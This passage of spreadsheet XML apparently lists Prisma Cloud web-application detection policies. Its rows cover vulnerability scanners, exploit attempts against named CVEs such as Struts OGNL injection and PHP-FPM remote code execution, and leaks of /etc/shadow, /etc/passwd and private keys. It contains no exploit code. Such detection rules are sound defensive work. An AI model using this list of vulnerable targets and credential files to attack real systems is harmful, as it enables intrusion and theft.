      </c>
      <c r="O3393" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3393" t="inlineStr">
        <is>
          <t>vulnerability_scanning</t>
        </is>
      </c>
      <c r="Q3393" t="inlineStr"/>
      <c r="R3393" t="inlineStr"/>
      <c r="S3393" t="inlineStr"/>
      <c r="T3393" t="b">
        <v>0</v>
      </c>
      <c r="U3393" t="inlineStr">
        <is>
          <t>web_attacks</t>
        </is>
      </c>
      <c r="V3393" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3393" t="inlineStr">
        <is>
          <t>This policy detects vulnerability scanners. Vulnerability scanners are automated tools that scan web applications for known security vulnerabilities and misconfiguration.
Vulnerability scanning can lead to data breaches by exposing resources that should not be publicly available, or revealing opportunities for hacking by exposing software versions, environment data, and so on.</t>
        </is>
      </c>
      <c r="X339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3" t="inlineStr"/>
      <c r="Z3393" t="inlineStr"/>
      <c r="AA3393" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3393" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3393" t="inlineStr"/>
      <c r="AD3393" t="b">
        <v>1</v>
      </c>
      <c r="AE3393" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3393" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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3" t="inlineStr">
        <is>
          <t>133ac27a-45ee-4da8-b7d1-cd8a474b0266</t>
        </is>
      </c>
      <c r="AI3393" t="inlineStr"/>
      <c r="AJ3393" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3393" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3394">
      <c r="A3394" t="inlineStr"/>
      <c r="B3394" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3394" s="2" t="inlineStr"/>
      <c r="D3394" t="inlineStr"/>
      <c r="E3394" t="inlineStr"/>
      <c r="F3394" t="inlineStr"/>
      <c r="G3394" t="b">
        <v>1</v>
      </c>
      <c r="H339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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3394" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3394" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2020-17530, CVE-2019-0230, CVE-2018-11776, CVE-2017-5638, CVE-2016-4461, CVE-2016-0785, CVE-2013-2135, CVE-2013-2134, CVE-2022-26134, CVE-2016-3081, CVE-2017-12611 - OGNL Evaluation Injection) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3394" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3394" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3394" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3394" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3394" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3394" t="inlineStr"/>
      <c r="R3394" t="inlineStr"/>
      <c r="S3394" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3394" t="b">
        <v>0</v>
      </c>
      <c r="U3394" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3394" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3394" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Apache Struts - OGNL Evaluation Injection.</t>
        </is>
      </c>
      <c r="X339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4" t="inlineStr"/>
      <c r="Z3394" t="inlineStr"/>
      <c r="AA3394" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3394" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3394" t="inlineStr"/>
      <c r="AD3394" t="b">
        <v>1</v>
      </c>
      <c r="AE3394" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3394" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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4" t="inlineStr">
        <is>
          <t>cfcd372d-93b6-47bb-8264-634b752e4baf</t>
        </is>
      </c>
      <c r="AI3394" t="inlineStr"/>
      <c r="AJ3394" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3394" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3395">
      <c r="A3395" t="inlineStr"/>
      <c r="B3395" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3395" s="2" t="inlineStr"/>
      <c r="D3395" t="inlineStr"/>
      <c r="E3395" t="inlineStr"/>
      <c r="F3395" t="inlineStr"/>
      <c r="G3395" t="b">
        <v>1</v>
      </c>
      <c r="H339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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3395" t="inlineStr">
        <is>
          <t>sensitive_data_exposure_api</t>
        </is>
      </c>
      <c r="K3395" t="inlineStr">
        <is>
          <t>Sensitive information detected in server response</t>
        </is>
      </c>
      <c r="L3395" t="inlineStr">
        <is>
          <t>DATA_EXFILTRATION</t>
        </is>
      </c>
      <c r="M3395" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3395" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3395" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3395" t="inlineStr">
        <is>
          <t>sensitive_data_exposure</t>
        </is>
      </c>
      <c r="Q3395" t="inlineStr"/>
      <c r="R3395" t="inlineStr"/>
      <c r="S3395" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3395" t="b">
        <v>0</v>
      </c>
      <c r="U3395" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3395" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3395" t="inlineStr">
        <is>
          <t>This policy detects situations where the contents of critical files, such as /etc/shadow, /etc/passwd, and private keys, are contained in responses. WAAS will also detect when responses contain directory listings, output from php_info() function calls, and other similar data leakage cases of potentially risky information.</t>
        </is>
      </c>
      <c r="X339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5" t="inlineStr"/>
      <c r="Z3395" t="inlineStr"/>
      <c r="AA3395" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3395" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:53</t>
        </is>
      </c>
      <c r="AC3395" t="inlineStr"/>
      <c r="AD3395" t="b">
        <v>1</v>
      </c>
      <c r="AE3395" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3395" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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5" t="inlineStr">
        <is>
          <t>48aad0c9-963a-41c2-9c34-38b92be5ee5c</t>
        </is>
      </c>
      <c r="AI3395" t="inlineStr"/>
      <c r="AJ3395" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3395" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3396">
      <c r="A3396" t="inlineStr"/>
      <c r="B3396" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3396" s="2" t="inlineStr"/>
      <c r="D3396" t="inlineStr"/>
      <c r="E3396" t="inlineStr"/>
      <c r="F3396" t="inlineStr"/>
      <c r="G3396" t="b">
        <v>1</v>
      </c>
      <c r="H339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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3396" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3396" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2022-21907 - Double Free in http.sys Remote Code Execution) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3396" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3396" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3396" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3396" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3396" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3396" t="inlineStr"/>
      <c r="R3396" t="inlineStr"/>
      <c r="S3396" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3396" t="b">
        <v>0</v>
      </c>
      <c r="U3396" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3396" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3396" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
HTTP Protocol Stack Remote Code Execution Vulnerability.</t>
        </is>
      </c>
      <c r="X339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6" t="inlineStr"/>
      <c r="Z3396" t="inlineStr"/>
      <c r="AA3396" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3396" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3396" t="inlineStr"/>
      <c r="AD3396" t="b">
        <v>1</v>
      </c>
      <c r="AE3396" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3396" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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6" t="inlineStr">
        <is>
          <t>4042a295-4b7e-4459-8ed2-3df3c93e564b</t>
        </is>
      </c>
      <c r="AI3396" t="inlineStr"/>
      <c r="AJ3396" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3396" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3397">
      <c r="A3397" t="inlineStr"/>
      <c r="B3397" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3397" s="2" t="inlineStr"/>
      <c r="D3397" t="inlineStr"/>
      <c r="E3397" t="inlineStr"/>
      <c r="F3397" t="inlineStr"/>
      <c r="G3397" t="b">
        <v>1</v>
      </c>
      <c r="H339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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3397" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3397" t="inlineStr">
        <is>
          <t>HTTP Library activity</t>
        </is>
      </c>
      <c r="L3397" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3397" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3397" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3397" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3397" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3397" t="inlineStr"/>
      <c r="R3397" t="inlineStr"/>
      <c r="S3397" t="inlineStr"/>
      <c r="T3397" t="b">
        <v>0</v>
      </c>
      <c r="U3397" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3397" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3397" t="inlineStr">
        <is>
          <t>This policy detects HTTP requests sent by HTTP Libraries.
HTTP code libraries are software tools that provide developers with pre-written code for handling HTTP requests and responses. 
These libraries can simplify the process of building web applications by abstracting away the complexities of the HTTP protocol.</t>
        </is>
      </c>
      <c r="X339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7" t="inlineStr"/>
      <c r="Z3397" t="inlineStr"/>
      <c r="AA3397" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3397" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3397" t="inlineStr"/>
      <c r="AD3397" t="b">
        <v>1</v>
      </c>
      <c r="AE3397" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3397" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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7" t="inlineStr">
        <is>
          <t>ebec30c2-304c-4f50-b181-2fc4f4c3d25c</t>
        </is>
      </c>
      <c r="AI3397" t="inlineStr"/>
      <c r="AJ3397" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3397" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3398">
      <c r="A3398" t="inlineStr"/>
      <c r="B3398" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3398" s="2" t="inlineStr"/>
      <c r="D3398" t="inlineStr"/>
      <c r="E3398" t="inlineStr"/>
      <c r="F3398" t="inlineStr"/>
      <c r="G3398" t="b">
        <v>1</v>
      </c>
      <c r="H33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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3398" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3398" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2019-11043 - Nginx PHP-FPM Remote Code Execution) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3398" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3398" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3398" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3398" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3398" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3398" t="inlineStr"/>
      <c r="R3398" t="inlineStr"/>
      <c r="S3398" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3398" t="b">
        <v>0</v>
      </c>
      <c r="U3398" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3398" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3398" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.</t>
        </is>
      </c>
      <c r="X339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8" t="inlineStr"/>
      <c r="Z3398" t="inlineStr"/>
      <c r="AA3398" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3398" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3398" t="inlineStr"/>
      <c r="AD3398" t="b">
        <v>1</v>
      </c>
      <c r="AE3398" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3398" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG33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8" t="inlineStr">
        <is>
          <t>7876e1ac-2279-40bc-a47e-4d1c6be0bbe1</t>
        </is>
      </c>
      <c r="AI3398" t="inlineStr"/>
      <c r="AJ3398" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3398" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3399">
      <c r="A3399" t="inlineStr"/>
      <c r="B3399" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3399" s="2" t="inlineStr"/>
      <c r="D3399" t="inlineStr"/>
      <c r="E3399" t="inlineStr"/>
      <c r="F3399" t="inlineStr"/>
      <c r="G3399" t="b">
        <v>1</v>
      </c>
      <c r="H339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399" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3399" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3399" t="inlineStr">
        <is>
          <t>An HTTP file upload attempt detected where the file does not conform to the permitted file types</t>
        </is>
      </c>
      <c r="L3399" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3399" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3399" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3399" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3399" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3399" t="inlineStr"/>
      <c r="R3399" t="inlineStr"/>
      <c r="S3399" t="inlineStr"/>
      <c r="T3399" t="b">
        <v>0</v>
      </c>
      <c r="U3399" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3399" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3399" t="inlineStr">
        <is>
          <t>The policy identifies and flags HTTP file upload attempts in which the uploaded file does not meet the allowed file types.</t>
        </is>
      </c>
      <c r="X339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399" t="inlineStr"/>
      <c r="Z3399" t="inlineStr"/>
      <c r="AA3399" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3399" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3399" t="inlineStr"/>
      <c r="AD3399" t="b">
        <v>1</v>
      </c>
      <c r="AE3399" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3399" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG339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399" t="inlineStr">
        <is>
          <t>c6428799-8152-4c21-b497-fb4460ade703</t>
        </is>
      </c>
      <c r="AI3399" t="inlineStr"/>
      <c r="AJ3399" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3399" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3400">
      <c r="A3400" t="inlineStr"/>
      <c r="B3400" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3400" s="2" t="inlineStr"/>
      <c r="D3400" t="inlineStr"/>
      <c r="E3400" t="inlineStr"/>
      <c r="F3400" t="inlineStr"/>
      <c r="G3400" t="b">
        <v>1</v>
      </c>
      <c r="H340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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3400" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3400" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2023-2253 - DoS in distribution/distribution) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3400" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3400" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3400" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3400" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3400" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3400" t="inlineStr"/>
      <c r="R3400" t="inlineStr"/>
      <c r="S3400" t="inlineStr"/>
      <c r="T3400" t="b">
        <v>0</v>
      </c>
      <c r="U3400" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3400" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3400" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits. distribution/distribution is a library that implements storing and distributing of container images. In affected versions this vulnerability may allow a remote attacker with sufficient privileges to cause a denial of service.</t>
        </is>
      </c>
      <c r="X340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0" t="inlineStr"/>
      <c r="Z3400" t="inlineStr"/>
      <c r="AA3400" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3400" t="inlineStr">
        <is>
          <t>2024-05-26 11:33:12</t>
        </is>
      </c>
      <c r="AC3400" t="inlineStr"/>
      <c r="AD3400" t="b">
        <v>1</v>
      </c>
      <c r="AE3400" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3400" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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0" t="inlineStr">
        <is>
          <t>bc8444da-917b-4289-86a2-e0c59b63f178</t>
        </is>
      </c>
      <c r="AI3400" t="inlineStr"/>
      <c r="AJ3400" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3400" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3401">
      <c r="A3401" t="inlineStr"/>
      <c r="B3401" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3401" s="2" t="inlineStr"/>
      <c r="D3401" t="inlineStr"/>
      <c r="E3401" t="inlineStr"/>
      <c r="F3401" t="inlineStr"/>
      <c r="G3401" t="b">
        <v>0</v>
      </c>
      <c r="H340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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3401" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3401" t="inlineStr">
        <is>
          <t>Content Feed Client activity</t>
        </is>
      </c>
      <c r="L3401" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3401" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3401" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3401" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3401" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3401" t="inlineStr"/>
      <c r="R3401" t="inlineStr"/>
      <c r="S3401" t="inlineStr"/>
      <c r="T3401" t="b">
        <v>0</v>
      </c>
      <c r="U3401" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3401" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3401" t="inlineStr">
        <is>
          <t>This policy detects automated tools, services or end-user clients that fetch web contents for feed readers.</t>
        </is>
      </c>
      <c r="X340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1" t="inlineStr"/>
      <c r="Z3401" t="inlineStr"/>
      <c r="AA3401" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3401" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3401" t="inlineStr"/>
      <c r="AD3401" t="b">
        <v>1</v>
      </c>
      <c r="AE3401" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3401" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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1" t="inlineStr">
        <is>
          <t>60cfdd80-aa22-47e8-91b8-a3789495901f</t>
        </is>
      </c>
      <c r="AI3401" t="inlineStr"/>
      <c r="AJ3401" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3401" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3402">
      <c r="A3402" t="inlineStr"/>
      <c r="B3402" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3402" s="2" t="inlineStr"/>
      <c r="D3402" t="inlineStr"/>
      <c r="E3402" t="inlineStr"/>
      <c r="F3402" t="inlineStr"/>
      <c r="G3402" t="b">
        <v>1</v>
      </c>
      <c r="H340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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3402" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3402" t="inlineStr">
        <is>
          <t>Request body exceeds the predefined inspection size limit</t>
        </is>
      </c>
      <c r="L3402" t="inlineStr">
        <is>
          <t>DEFENSE_EVASION</t>
        </is>
      </c>
      <c r="M3402" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3402" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3402" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3402" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3402" t="inlineStr"/>
      <c r="R3402" t="inlineStr"/>
      <c r="S3402" t="inlineStr"/>
      <c r="T3402" t="b">
        <v>0</v>
      </c>
      <c r="U3402" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3402" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3402" t="inlineStr">
        <is>
          <t>The policy alerts on requests where the size of the request body exceeds the predefined inspection size limit. The body content of such request is not inspected in full and may effect detection accuracy.</t>
        </is>
      </c>
      <c r="X340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2" t="inlineStr"/>
      <c r="Z3402" t="inlineStr"/>
      <c r="AA3402" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3402" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3402" t="inlineStr"/>
      <c r="AD3402" t="b">
        <v>1</v>
      </c>
      <c r="AE3402" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3402" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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2" t="inlineStr">
        <is>
          <t>d0e08710-45bc-4795-86f4-92486f9ca54b</t>
        </is>
      </c>
      <c r="AI3402" t="inlineStr"/>
      <c r="AJ3402" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3402" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3403">
      <c r="A3403" t="inlineStr"/>
      <c r="B3403" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3403" s="2" t="inlineStr"/>
      <c r="D3403" t="inlineStr"/>
      <c r="E3403" t="inlineStr"/>
      <c r="F3403" t="inlineStr"/>
      <c r="G3403" t="b">
        <v>1</v>
      </c>
      <c r="H34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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3403" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="K3403" t="inlineStr">
        <is>
          <t>Access attempt has been detected in HTTP traffic from an IP address originating in a country that is either listed in a blocklist or not included in the list of allowed countries</t>
        </is>
      </c>
      <c r="L3403" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3403" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3403" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3403" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3403" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3403" t="inlineStr"/>
      <c r="R3403" t="inlineStr"/>
      <c r="S3403" t="inlineStr"/>
      <c r="T3403" t="b">
        <v>0</v>
      </c>
      <c r="U3403" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3403" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3403" t="inlineStr">
        <is>
          <t>Prisma Cloud allows for control over how applications and end-users communicate with  web application.
IP-based  lists can be specified in:
- Blocklisted Inbound Source countries - for acting on requests originating from the specified countries.
- Allowed Inbound Source countries - for acting on requests originating from requests not originating from the specified countries.</t>
        </is>
      </c>
      <c r="X340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3" t="inlineStr"/>
      <c r="Z3403" t="inlineStr"/>
      <c r="AA3403" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3403" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3403" t="inlineStr"/>
      <c r="AD3403" t="b">
        <v>1</v>
      </c>
      <c r="AE3403" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3403" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG34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3" t="inlineStr">
        <is>
          <t>84ab22f7-64b0-47f0-a86c-b5cd89be8827</t>
        </is>
      </c>
      <c r="AI3403" t="inlineStr"/>
      <c r="AJ3403" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3403" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3404">
      <c r="A3404" t="inlineStr"/>
      <c r="B3404" s="2" t="inlineStr">
        <is>
